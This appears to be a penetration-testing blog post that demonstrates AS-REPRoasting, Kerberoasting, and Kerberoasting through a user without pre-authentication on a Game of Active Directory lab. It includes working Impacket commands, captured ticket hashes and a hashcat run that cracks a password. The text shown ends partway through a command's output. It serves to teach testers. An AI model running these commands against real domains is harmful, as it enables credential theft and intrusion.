Kerberos ticket abuse is a significant issue for organizations that use Active Directory. Kerberos is the default authentication mechanism in Active Directory environments, and if an attacker can compromise or forge Kerberos tickets, then they may be able to gain a solid foothold in the domain. This post is primarily aimed at testers who perform, or will be performing, internal network penetration tests. I’ll be going over two common methods for exploiting Kerberos tickets and highlighting a third. First, I’ll discuss AS-REPRoasting, in which an attacker is able to obtain a Kerberos Ticket Granting Ticket (TGT) on behalf of a user configured to not require Kerberos pre-authentication before the Domain Controller issues the TGT. After that, I’ll go through the well known and loved Kerberoasting attack, which abuses user accounts configured with Service Principal Names (SPNs) used to run services. One drawback to the Kerberoasting attack is the need for existing user credentials. This is especially true if you, as a tester, are struggling to find a way into the environment and other methods of gaining access to a user account have failed. Which brings me to the ”third” attack…Kerberoasting through the AS-REPRoastable user. I put third in quotes because this is not a completely separate and distinct attack, but a combination of the two. This alleviates the need for user credentials to obtain service tickets for those user accounts being used to run services. Since many times services run with elevated permissions, if you can crack the password hash of one of those accounts, you could very well end up not only snagging user credentials, but potentially user credentials for an account that can do some things! It should be noted that the exploit methods outlined in this article are not particularly stealthy, so “red teams” and anyone else concerned about not getting caught by defenders should think twice before following along with these steps. I’ll also discuss mitigations and detections for these abuses, but the primary focus is on the testing/exploit aspect of these issues.
Before getting into further discussion of Kerberos ticket abuse, it’s important to define some terms.
Terms
- Domain Controller (DC): A server that manages access to network resources in a Windows domain, including authentication and directory services.
- Key Distribution Center (KDC): A component of the Kerberos protocol responsible for issuing tickets and authenticating users and services.
- Authentication Service Request (AS-REQ): A request sent by a client to the KDC to obtain an initial authentication ticket.
- Authentication Service Response (AS-REP): The response from the KDC to the client’s AS-REQ, containing the ticket granting ticket (TGT).
- Ticket Granting Service Request (TGS-REQ): A request sent to the KDC to obtain a ticket for a specific service, using the TGT.
- Ticket Granting Service Response (TGS-REP): The response from the KDC providing the ticket for the requested service.
A Simplified Overview of Kerberos Authentication
Kerberos is complicated, and the complete inner workings of the protocol is outside the scope of this article. For a shared understanding on how Kerberos authentication works, I want to share an analogy I heard recently. I had the privilege of attending a workshop put on by Tim Medin from Red Siege (who incidentally discovered Kerberoasting in 2014). Before this workshop, the main analogy for Kerberos authentication I had heard was that of going to a theme park. However, Tim’s analogy resonated a lot more with me, so that’s the one I’m going to use here.
Movie Pass was a service that allowed customers to go see unlimited movies in theaters. For this analogy, consider the following:
- A customer sends their credit card number to Movie Pass. After verifying that the credit card number is valid, Movie Pass sends the customer back a card they can carry in their wallet that they can use at participating theaters. Think of this as the user sending an AS-REQ to the KDC, and the KDC verifying the user’s hash and sending back a TGT in an AS-REP message.
- The customer takes the Movie Pass card to the theater and presents it to the person working at the counter and tells them what movie they want to see. The worker behind the counter checks the movie pass card and then gives the customer a paper ticket for the movie they want to see. Think of this as the user sending their TGT to the KDC and requesting a TGS for a specific service in the domain via a TGS-REQ, then the KDC sending back a service ticket in a TGS-REP message.
- After they get their ticket and take out a second mortgage on their house for a large popcorn and a drink, the customer takes the paper ticket over to the 16-year-old kid at the specific auditorium where the desired movie is showing. The kid takes the ticket, rips it in half, and allows the customer to enter the auditorium to watch the movie. This is the equivalent of the user presenting their service ticket to the desired domain service.
What is AS-REPRoasting?
Note that the only time the user needs to present their credit card number (password hash) is when they initially purchase the Movie Pass (AS-REQ). It’s the same in the AD environment; the only time a user needs to present their password is during the initial authentication step. This is known as Kerberos pre-authentication, and its main purpose is to ensure the user who requests the TGT is who they say they are. It is possible, however, for users to be configured that they do not require Kerberos pre-authentication to retrieve a TGT. When users are configured this way, any other user may request a TGT on that user’s behalf. Because the AS-REP message contains a portion that is encrypted with the user’s NT hash, it is possible to perform an offline brute force password attack with a tool like Hashcat. This attack is known as “AS-REPRoasting”.
What is Kerberoasting?
Kerberoasting is very similar to the attack outlined above, except that instead of targeting users configured to not require Kerberos pre-authentication to get a TGT on their behalf, the Kerberoasting attack abuses the fact that any authenticated domain user can request a service ticket for any service in the domain. In Active Directory, services are distinguished by a Service Principal Name (SPN). When user accounts are configured with an SPN, they effectively function as service accounts.
The major issue arises if those user accounts acting as service accounts have weak passwords set. The TGS-REP message contains an encrypted part which is encrypted with a key derived from the password of the service account (the service account’s NT hash). Since any authenticated user can request a service ticket for any service in the domain, that includes those user accounts with SPNs that may be using weak passwords. Although Kerberoasting is similar in principle to AS-REPRoasting, it could potentially be far worse because service accounts often have some degree of elevated privileges (not always, but often), whereas normal user accounts probably don’t.
The Attacks
To demonstrate these attacks, we’ll be using Game of Active Directory (GOAD), which can be installed using the instructions here. The following table highlights the relevant infrastructure:
| IP | Description |
| 10.4.10.11 | Domain Controller |
AS-REPRoasting
The following snippet shows the AS-REPRoast attack in action. Here, I’m using the GetNPUsers.py tool from the Impacket toolkit.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
$ GetNPUsers.py -dc-ip 10.4.10.11 -usersfile users.txt north.sevenkingdoms.local/ Impacket v0.13.0.dev0+20250103.90111.06863ae - Copyright Fortra, LLC and its affiliated companies [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User localuser doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [email protected]:e1cb926d006e012b353579fbfd3d0a68$e71f0b5a81cb83407ded9101a076461dad220f05dbcdf1ca0fbb528579483d036ef4fe09df4199ab75317439c93befa932007f5a353e52010112aa3f381cd44aa589f9560d0c2ffffbd4b701657db2377dd7e9b51555ca3d7a46b71ac6a5cce5b32a2185078ee634944150b0b70af1679b525c517256f67804584123aa1da314a0c9c27b7dd69c0b685174527e5c4a3d4bdfc902556bea957e2105673f3f93806503784f42ba74252ece2ee8409c86837543c9c3bce4241b6cd37da3b84e67b8d31c33a93df2e97cfbf325d114b9b083a7562c35f3f4fe24449437da1e084e3934b146b92d289520788b01aac76f9e58a069c8e935e3dc5aaa1ddb1b0b01befa253943751568 [-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set |
Let’s break this command down a bit:
- -dc-ip: This is the IP of the target DC.
- -usersfile: This is the list of usernames to test. This can be a list enumerated through other means, such as anonymous RPC, brute forcing usernames with a tool like Kerbrute, etc.
- north.sevenkingdoms.local/: This is the target domain.
Note that the brandon.stark user does not require Kerberos pre-authentication and we’re able to obtain the hash from the AS-REP message, which again, is encrypted with a key derived from the user’s password (NT hash). I ran into this on a recent internal network penetration test where I was able to obtain AS-REP hashes for two users, which subsequently cracked and gave me access to a bunch of other resources in the domain. I’ll circle back to this shortly, but before I do, let’s briefly discuss Kerberoasting.
Kerberoasting
The following snippet shows this in practice:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
$ GetUserSPNs.py -dc-ip 10.4.10.11 -usersfile users.txt -request north.sevenkingdoms.local/arya.stark:Needle Impacket v0.13.0.dev0+20250103.90111.06863ae - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: localuser - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$18$krbtgt$NORTH.SEVENKINGDOMS.LOCAL$*krbtgt*$59b479f8978762753f6c1b2c$67d47fc14931047e56f31ba214d6019098087a74aba2f965bac7f26b84899693ab0d9722941ab08ee675ebe3122e136bed6f80079c068e8547593e17d76d6fcb652e08fd618c1ec7f1601ae3b8be7829c8029f89232592054f6f19c31d7849ffc5998e555691f28bf240936c9058ac84c017b10507094e3251dd843eb42ebaa4a90324d0eb2e69918b9aba4af49ee7eb659fd1c95fa1fea315daf05af84fcf5f75df66db72f9c4d32068368a7534dda0220160863d857a2c5120d684f3783b7bdf47c84107bbcca0b5940dae59ac62f3042fbb06c145a27e843042e3782e71bcec64278c81238338ca7f519276b8466b9d5c75420ad48b91a66f99917fec09b65de30e675d200eb2bd05c4156bb3bde4f3ea9f3a08dad429cd501853497faf828bfe717068412dd4ffebf753261597e3d1d7505ecac372df5916ddbd760fb071859b0d9a8ea6561d1fb63fe8ca809019e0de74524b401a9b91560677b029ea252d2d68d63661ebf0f3185723f9500e7437eb1d44176947b6192ff9a2a37df24463d135039b7c552323454c78bf6a32e3fbe18296c66a9330e7d9887d511ed48ce4f2a2403a69d07552eb34832d3fe0b9c61499ad928cebd3f85bc2d415c5f5a48bc33fb3203ac8e988255bc7a4f9e8ff130860ec68be1e4d24e27a323c4539332eae971edb24324fcf970312e1693bce5c66b6ce6cfc43c94af4b49bfeded938a59d8da312e697ac0e523aaf89ef36d00fbd5cd8da6b00b0249a2c0f221279c9a32809e16be4d06a6406887a552950ec6f061175ad15eff60859f5564ff93639321e75fa49de138cc3ad61e0edefff4171d93472ece8d83faa6c67e611ffbe84e2fa7e0a0965c190c299a5ba1ac0df7e12c72997296590420253f96f9433887c3f64ce4879133539d5b729dd6e78126cda35b84c31d1149bcd446f50c2a3d46c019a2f631113f493d809919bc74cb0eb3e2bc1bf9c429d7f23d14665b8552a00b6531912d01f257790c5c759db7491b56958684efe4fb568fe7dc43cffdfff80e0a00034cf953972c76853dbdabde03d3e626da74eef04a017f95756dd9680575a378c71a57dc19720d4567d97ba14d6b17932127a9b39bcd838aef1bed3b7685aaab7f5ecdadf1de49a8471353924b442458fac235883b25bf862eef03ed7e227b6668a500ba09e7a41edd776de69dabfaa7a1ffcabb2d4843893bbd8b250dbd41d556f46a2101328ffec6e59218c34980c2a9bbe4575cdc64b2315f69b9bff624c0cb178a7e9e0b8a18c1e07c07add43e78bdff89c68ef7a31a5e4832886885347f66cacb250496d9521dc1a01346114f085a4c38b0dadf3dd73bb233b568fd302fba4465e93581dc25ac2d7909fbc62481be66a811153f8de510537e04b350759eb5489c0db924cadae542a0717a3c91c76f82f86ae9bed30ec012c5312f3b232e7a99ada028446273349248b8c66a8cbc57d4dec86e35cfbc76f251aacf1e8535b385b03aa78a45077fe866d09c74d03f34debce77f2e69f3ba2d48da81e54b472141681389d2ebb9e6f172c63e4d3c46944d8368da2deaf8534202d370feacdb42217d522e2486821e8eff1d88615cd0c3a08d6f6851fe73bb9 [-] Principal: arya.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: eddard.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: catelyn.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: robb.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$sansa.stark*$27bcac5fd6bd1ccf098e32d900a57b3d$45838af61cc44aaa8ffaffc21ed1b365f954fa9fc7fb6956e6c33a06658953534029fe7db516fbf943703bebafc59546984259fd3abae49c8e0dfbd2ef9043fab12cf2447e44517fd65665bb2de68af4f3e44de806b34b65d5d63cdc0e81afae4aa97a9c61aba71bfff331ed6255b0215dafbdb2ad4b7a398f69614151cdbda561fc30579d214d3c8895e32233b94b0bfb8d9168d5d19b997ab73a45029bdab4b5f934186fa269a8a44a3e70b4cf526fa2f39289313d124e56bbf5d347355f55bb9cd9d488e248b7fc3af719c973e5beb1e1e9e40e6bd10c95662311eecde8667e5d81190be1ff7f3af6af774fe068b9f979cdf49049c396a200b07eaec58fbe4c8bb1e95d9743b45921261c3cadf094ac65bb2541c9e08e4ebd4bb8974c64d2a7b6615e9e1fa77f62801f95fbabd043ead1b08b55705be3e86ad83f46b371fe9929831b4a44b1e7fee23a17d06d195b4b414114a3e98cd3c314dc25891a969f5b168171a40214b779a6dcfa6f633272eb8fffc8a306f29772fac5adce69107fd9998d723e6c615f5787d162bfae1e6b365714f8ca3c0131575b957fc281d64abdf65e253f9441c7ff5d4610c603e4ad4f1a2cff54c2ebc30e632286b783b913291111cb8f7b598efe0820325b9dcb3746ca5d093ec7e6cdda18e4b869a437b7de4cbaf612def46975681852937589700777ef786a7b5f740de9628fde60849737bc8efde235e4a8bc96369ee1477b60d2e44a0e238099ac000a1e0722a83e1c9fca9c882f712a46f299911841e135c119c32b28a6af975d9d3fdcb5b4f6f72338f308190e445ce7a475456545f94b507b07d6f63d6c67065af865f04649546495354957c703f271787da37daf195ad7747633f2101622eacb00e90e9eb32733e4b3cda54d665914c58272be72b8d0d6d6b57cd227b61c300a2ecafe4efe31ab5241613f120e888b99b5cad30b6263f560abfef8708840d8b08f3bc308aa023890f493be6f335f4491b902c5c5e787390a7affeca4adc6cf5fb2766c72948899d41bf3be4d43a46eaa2c2936dc8fcbb5da5038e49564117d09c1aa42ced0142692579372395835afbd561661d43845ff0bd49ce831a8ce1599a9c4b3f9210e6e4e97301efa1ddcd52b725cbeebb186a70e040c387e05453c0848ef06c6a0f2c4461b35f8beb9c32fdfbb471ac52c3fa34af68a2e2b462a8faf5856b9d52abb8eb597814a458a8129b3dd8ec134b560ecc1c5c7ebb2e4104d0728054404626fffa03246d5524468f2b1c223ec4b5af03ca77c5c366064efcfaf50397ebf0de947545d7ff6d5225f66c8b0de4349c68e12ecb9e282ca282aabf02e63ab5bea14bc723291e5ae0bd5d9d581cd3842720b53cf7afce5a76babebea39e302a6c8280f7387baa4b484347396b2bc3d12fe8f9668374e44044661aaf733c3582233c15492873e5e2e16d8242f8240bc248667ed5da25181a76537fc5f51fa7eed61aec144741165b80f7540d7beb9cd73e106817d91f49e69c2ae6b3aec976f4bf5e95b17609cd7fdf33ffc3bedaa2fa4991fd56440ade61a060eb4a03d8c93dfe35e170bebb02380f1c9f6d06d0f3e1411056b41cafc41 [-] Principal: brandon.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: rickon.stark - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: hodor - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$jon.snow*$56dd0432ca6bfa4fd59fd444d2e92765$0e1e33492e2e238f1bd35872f3980a1c786df5d4ae061a07d5822e6b975a899f9b2c6e41e1d7a438b2c0278afe1122769e82f3e1381df12ed7b7618be39369b6d7a95f800398de52867262713ad00cd91a655b68e71512f10eacdf49249d09a66f355098b8cd8830e891984ee69d37df3e12bed100b887a3d546e6940fe5374c9bd1257011523ed2a302ee217d10d68962e06c1042a7095924f111a6828a44284916f1f95fa023d7e2c5614ce72bdde6c1019d00235f607ee1eb2453ab74d5a3809fdfa88e7a4d90e9f4de87b10d05df119e31266039e503abe782cc2eaad2368ce0275aff462315d57dfd8b0b3d5c115b3d6a1be3efa7bf4d39882442fc03d353f51bb21853f1874f09fea256a06aae67ef3d23868757016a46feb0dc69f60942a56653fde6cedcb3a4ac42098899798b7db493bc263c496ecb2bf48ee254c246e4862f5dd7028346ed429140f42f6f6af7249346e5e4926114d57b419fa97d3aa39ddcbeeed8af7533ba66d18ca489423478a05aba8561d191ce9accef9be81e45b523a2ea79d6eaf00c38485e4b9554ee2823b9ecb7261e291d3e8a25e73aac04743cafec69d8b0cd30dd7aae2f9d1183825237fb0ac0b389bf2967d4be7556b01f115ada3a1f32b583638c1710c64ce454e96b9c4f017e06e30c123a0a3b495ede4fe0eb39a0e3dc5d1521c3503175baa03e1b431e6f81b1d8fafa11f78dcbcabca06150fc5718529fb8c52c20d3819900e105e2a31c879a1e2606261e22ad1c266f779396e345e2a3f1ea911b20423a25a66a0191f4c04e361a4c3aca256294a599460d679125142eccea5d9de847af7d9b5efe2806a8a6067388f23c05ff8a466d227df7ea52084d0af712eaf7e0759d2f472ca883cc2e63eacc3c29be55fce9361cdd42178bdf04f5062c005bcd42b1dfbc5ad0c0ebafaabb69f48fc3f7d0b2a9af5ddf11deea3b28d816b2901558ffa1fd44140682eeb9d621e31074a6e9b8fa49004c3bb8d2b45d9ea1bf26780c22e5dc013fb6fcf1704deb69dd4427ba64e9dec459ac6c81a7f74e98db97aa0e1a09b94a9c4cfd09580876d5963214147a9dfb9bce60a244a2d5fe7b23641656189b5085f0a1cd7fa559f43ba3eb2114e66776ef87686f49cc36421271f6e802a54395cb70e00003b0a9c5258eb495a52ffd832db1a92fbc4f29e908e32f7b35a8426a420edec9051122734dd853c014ed8749f9825e063700509cff1ca753a59e7096342010180bf4851957c64851228b39d95a330829e44ced860d3aa3e636cf43eb2d98b5487935583a61ac43da14d6a2fea6b2f84f22f9336057e2365e53f77adf169bcd6eca24580a22494fde510a7ee1ad1a62061f916b8c987388d25cdbeae3397bc84f72168035de2c59ecb023f93192a7a20bba2333150b02bf921ec1ced81a0e25391202f4e53591b8e8364e0d1cad3bd7780c07895c8edb4eded2ebf4ae977abf4925f7c606326495ffc6f2c4754205dd38a65ade01b4f98e7250904f9414c00ab5908a8b7908682b4309aac9c9c57de2c31e9ca5d433aeb01cef81cda911746b7896cfc3d80224be541778c9ba24afb49ff63dd0a080a64f896d94a9 [-] Principal: samwell.tarly - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) [-] Principal: jeor.mormont - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database) $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$sql_svc*$b4bc35b15f4deacc7f3f9f629be50442$3de23bc3e5f2ee5c6b3ba66f62f9033f481a2e60c95b7e0959dd62ba2a1ef29e52451bd1e259d13d55b78ba4fb54a9a02d9473463e735c737f3b38560f00d7d8b128afb197e979b79c2e9b783879ef3ffb1a0bdc8a7b3b6560bb7b81499469564a1a2c39cfbba01d764d8646a921b6389266a5bbf3ababc95cf336f3fe1e5ad25e950955e98e901e0ac7a3cd3357653b8fc8b134e69360dbee0125037d2d81e90129c290cb496d07b1e98e4babf0810fbedfcc3bef4a6632a31a724e7e3b0f21543ddb383e0e7b9df167eb0c17c5a9646a7c0a63c92183317a177e42af13dda0ad29ea7ff48af6d326e84f45a95043ae3ef054db2bb081ff31a5cdbbaad0ee22dee6fa90328e59f14ac812971eb2df8b674fd4fbaeda7438c9f13df1480628dba0c6d072b3a518df8de580eada9539c3c40d0b1772a422ff2fb41616c819273cfc4493601755346795e10e6eb4a8af1a371dcd313fe6273b682c9a59a8e320248fcce77098fca16afb226b5d6a087b583b35f1b4dfb8b119e6f191df2e6638d8bf16d2dddf43414225606435a1fa0a5a839286775718f95d22a3f97eac8642b3dae98c7f1f6c568d741dd094c5d264fffe05bc647bbb6f187cc3462ff59d829a81b66582a1d92a6af0074dcbdb32c8ad5f27b272bdb7d168adfac30379a6606d0f807fa5c3537ea456f5addf6423c401abb7a1447195625827632eb7b2876f0dd606825999873a1dd1d0d576eaabd3396d8b1f5e9f48e5c5aa454211b8a689339434a50ad160c9a2738976c87c27999514c29a8008867aa3e7c2eb40cf7763fb6eec3c83adb73f1f91b5bc29f1f624e9ecfcdcafa84bb6d45959b9e768149efe7aa90dd746a36f9a66092c7ea1c31282418363e598eb9f344f7f477ba12e182ad866b36fd33b647cb5a70fbb98e7fe68b0936b5252c8ef289cc560411a333fa4f6a7938c103aa4fbec199bd67321882276693eddd27e1a43a790c3dbe4f129d1b6219bebc3bfe2807a8cbb87245151d75a81da144d1af8ce26e6b1b9d83fffc967e27af7badefda8c310b0f992f1587fe3f2e66f5ef612c0388d2e9be0b44d5d0b4621ebfe7ace0e191d98598e36d84ee8585fd81748ee96e3a2a0d3be148fa45581bf9d33fa010d1d4d66e923f77fced7da9628f4fd2900e32b0cede4b282efd05321e0f6ec5d02ffb436af3928e1d4c66f3c16a08e6ae2b16b223798103424b461826d066d0d62a3b1690c118b4700ed0da3458d06b347e75c51d97f8c5ed0faf70e1327c55c92bb5aa6145a09c1a017ef63dc2b98bae29fde67036bcd4a823cb1e464332b819c7c2c92df4e3d4c6acb771615eaafb04f3cdba7ae9d584f6c9a04e086c0a70f63ae07da2805df1db1119cc3eed5d4c4376ae4aca832984b49c8d338e056483c3b1862fcba4fe7b2cb6839f67131f5622f8a17698ee3717f9b054fc99803ec605ae9aeae0a5c4b375cd1b4820f06898cefbe92755f12bae05e28b039e1aed3bdef34bfa17e38c961d131ad511ea1dbb99c8b7bc836ebd7838fe62e1d06dc5ca25f9bc0e02ac09ec1d504f355a3909b3099fbd38c0e45c6c3a0d5c71a9e1a820b29f86527a7a1ffd654e4b6dd26 |
Awesome, we were able to obtain TGS hashes for several users configured with SPNs. For the purpose of demonstration, we can dump the jon.snow user’s TGS hash into a file and perform an offline password attack with hashcat. In this case, it cracks quickly.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
$ hashcat -a 0 -m 13100 jonsnow.hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting [...SNIP...] $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$jon.snow*$56dd0432ca6bfa4fd59fd444d2e92765$0e1e33492e2e238f1bd35872f3980a1c786df5d4ae061a07d5822e6b975a899f9b2c6e41e1d7a438b2c0278afe1122769e82f3e1381df12ed7b7618be39369b6d7a95f800398de52867262713ad00cd91a655b68e71512f10eacdf49249d09a66f355098b8cd8830e891984ee69d37df3e12bed100b887a3d546e6940fe5374c9bd1257011523ed2a302ee217d10d68962e06c1042a7095924f111a6828a44284916f1f95fa023d7e2c5614ce72bdde6c1019d00235f607ee1eb2453ab74d5a3809fdfa88e7a4d90e9f4de87b10d05df119e31266039e503abe782cc2eaad2368ce0275aff462315d57dfd8b0b3d5c115b3d6a1be3efa7bf4d39882442fc03d353f51bb21853f1874f09fea256a06aae67ef3d23868757016a46feb0dc69f60942a56653fde6cedcb3a4ac42098899798b7db493bc263c496ecb2bf48ee254c246e4862f5dd7028346ed429140f42f6f6af7249346e5e4926114d57b419fa97d3aa39ddcbeeed8af7533ba66d18ca489423478a05aba8561d191ce9accef9be81e45b523a2ea79d6eaf00c38485e4b9554ee2823b9ecb7261e291d3e8a25e73aac04743cafec69d8b0cd30dd7aae2f9d1183825237fb0ac0b389bf2967d4be7556b01f115ada3a1f32b583638c1710c64ce454e96b9c4f017e06e30c123a0a3b495ede4fe0eb39a0e3dc5d1521c3503175baa03e1b431e6f81b1d8fafa11f78dcbcabca06150fc5718529fb8c52c20d3819900e105e2a31c879a1e2606261e22ad1c266f779396e345e2a3f1ea911b20423a25a66a0191f4c04e361a4c3aca256294a599460d679125142eccea5d9de847af7d9b5efe2806a8a6067388f23c05ff8a466d227df7ea52084d0af712eaf7e0759d2f472ca883cc2e63eacc3c29be55fce9361cdd42178bdf04f5062c005bcd42b1dfbc5ad0c0ebafaabb69f48fc3f7d0b2a9af5ddf11deea3b28d816b2901558ffa1fd44140682eeb9d621e31074a6e9b8fa49004c3bb8d2b45d9ea1bf26780c22e5dc013fb6fcf1704deb69dd4427ba64e9dec459ac6c81a7f74e98db97aa0e1a09b94a9c4cfd09580876d5963214147a9dfb9bce60a244a2d5fe7b23641656189b5085f0a1cd7fa559f43ba3eb2114e66776ef87686f49cc36421271f6e802a54395cb70e00003b0a9c5258eb495a52ffd832db1a92fbc4f29e908e32f7b35a8426a420edec9051122734dd853c014ed8749f9825e063700509cff1ca753a59e7096342010180bf4851957c64851228b39d95a330829e44ced860d3aa3e636cf43eb2d98b5487935583a61ac43da14d6a2fea6b2f84f22f9336057e2365e53f77adf169bcd6eca24580a22494fde510a7ee1ad1a62061f916b8c987388d25cdbeae3397bc84f72168035de2c59ecb023f93192a7a20bba2333150b02bf921ec1ced81a0e25391202f4e53591b8e8364e0d1cad3bd7780c07895c8edb4eded2ebf4ae977abf4925f7c606326495ffc6f2c4754205dd38a65ade01b4f98e7250904f9414c00ab5908a8b7908682b4309aac9c9c57de2c31e9ca5d433aeb01cef81cda911746b7896cfc3d80224be541778c9ba24afb49ff63dd0a080a64f896d94a9:iknownothing Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$<em>*</em>jon.snow$NORTH.SEVENKINGDOMS.LOCAL$jon...6d94a9 Time.Started.....: Wed Feb 26 08:05:23 2025 (4 secs) Time.Estimated...: Wed Feb 26 08:05:27 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 2007.7 kH/s (0.37ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 7434240/14344385 (51.83%) Rejected.........: 0/7434240 (0.00%) Restore.Point....: 7433216/14344385 (51.82%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ikupjesus -> ikkiattle Started: Wed Feb 26 08:05:06 2025 Stopped: Wed Feb 26 08:05:28 2025 |
Cool, but cracking is not the point of this blog post. At this point I should highlight a couple of things:
- In the recent engagement I mentioned, the two AS-REPRoastable user account hashes “cracked”, and I was able to retrieve the plaintext passwords which I could use for additional domain enumeration.
- Here is a good point to reiterate that Kerberoasting can often be more impactful than AS-REPRoasting by virtue of the likelihood of service accounts having elevated privileges that “normal” user accounts probably don’t have. There’s a catch though…to perform a Kerberoasting attack, the attacker needs to already have a set of valid domain credentials.
Skip the Line
So… what if you’re on an engagement and you’ve identified an AS-REPRoastable user, but despite your best hashcat-fu, the sucker just won’t crack. What if no amount of other AD trickery has yielded another domain account that you can use either? The answer is: Kerberoast through the AS-REPRoastable user. Going back to our (Tim’s) original analogy:
- Imagine Bob has won a contest where the prize is a free Movie Pass. Since Movie Pass has it in their system that Bob is not required to provide credit card information to receive the nifty card to put in his wallet, Alice can go to Movie Pass and say, “I’m Bob, please send me a nifty card that I can put in my wallet”. Since this exists in a world where no other forms of identification exist, Movie Pass says, “Sure, here’s your nifty card!” Alice can now go see as many movies as she wants.
That’s essentially what we’re doing here. For this example, I’m going to tell the DC, “I’m brandon.stark…give me all the service tickets!” Since the brandon.stark user doesn’t require pre-authentication, the DC KDC says, “sure, here you go!”
This is the Kerberoasting through the AS-REPRoastable user attack in practice:
|
1 2 3 4 5 6 7 8 9 |
$ GetUserSPNs.py -dc-ip 10.4.10.11 -no-preauth brandon.stark -usersfile users.txt -request north.sevenkingdoms.local/ Impacket v0.13.0.dev0+20250103.90111.06863ae - Copyright Fortra, LLC and its affiliated companies [...SNIP...] $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$jon.snow*$ad9513acff111173916680db16aa32e6$a9752fa8a78af5e3dc657238ce7b307f17723e0729df44fdba6f27853796a6f99441899cc772c577065bd24098831ac62b3ffcaf7dd26d6ff2971245c8f2be1ea17849f2aae336084ad16e6847daaa3c6a079fa2e710af1d60097fb8d23c91e075d9cb867982007ecd0a44f3351a96f38f2378e16ea27ec2661d7b9b4b2f86f199a43774559a1b6914cab624906c14643983b66b631221788d27c0b0824ee79e879f6b6cc2ee57f90d103df36778cf5d7f05baf5f5ca829655277fe9d9547e4072a9fac3eba2ff28e67958f472c0badd0a336ce541feecda69483a48192546ea6b56357447e9133dfdfd6b9b8f9f7be687544575544fc22a9d35a40691e91717f5d92e8652c9e47b3b8c2b94488b20d0874213780ca455f8226201a581b30b8dccc4db4d8235fe1033fa015fcaf6af0ec311e11066510a9efd89c645fe13cb58aea22d3ec320f7de7aaffdf8181bedc75eeb0559eace54974a10ceb344e7b4f42aef89e2a2c504aeccd9e1b1411cc811d615908dff13eb3004846c89f06051af0d8e6ddc741b575b1a8e38f298e1ff313d81d6387adcc27818c9a8a92df28575fe2bf2453f2afa11cca03e657ada43a07918c95bebbda227601c4091bd41ef2f2c4a3e9bb835a2d7db2050b9370341e4de89869d55eed204fbd6262b2a59fc77dee80918ca40c285208d9b93b5a7da94f7784ba35108b36a9688b3255d1414cdad79678933bcc4e1e338da607359cb0ebcef55c8a7d13012a8e0697f7ce3e911ff36b9cd472ea4261e67e36e8820b41c5bc30e5c2d1a4e0715296ef3ed708aef4d50809879dcf413367b02c33361d4a23a474b1e66c6ee30715ec93252ece9ec654fc5e7983cd41a0f785f91a461e847072192f94df71ff8248732ca7987938808d2eb7c773085c0db4712a13c1dcae911bdfac210801acd42452e584452b619a8c32f5d299dd94fdc2f59a58f290686681fb940f1ecaadef43cd4f21924aa3cb1769f5d382151a6ee58aba191cb1b19bc59707622974f9766ec883990f9bb8ae88fcea1ccd82546d1051405f3b194d947195901923139cc55c288d2f8bff8a59d1cdc30b9dfec043f0b5b208a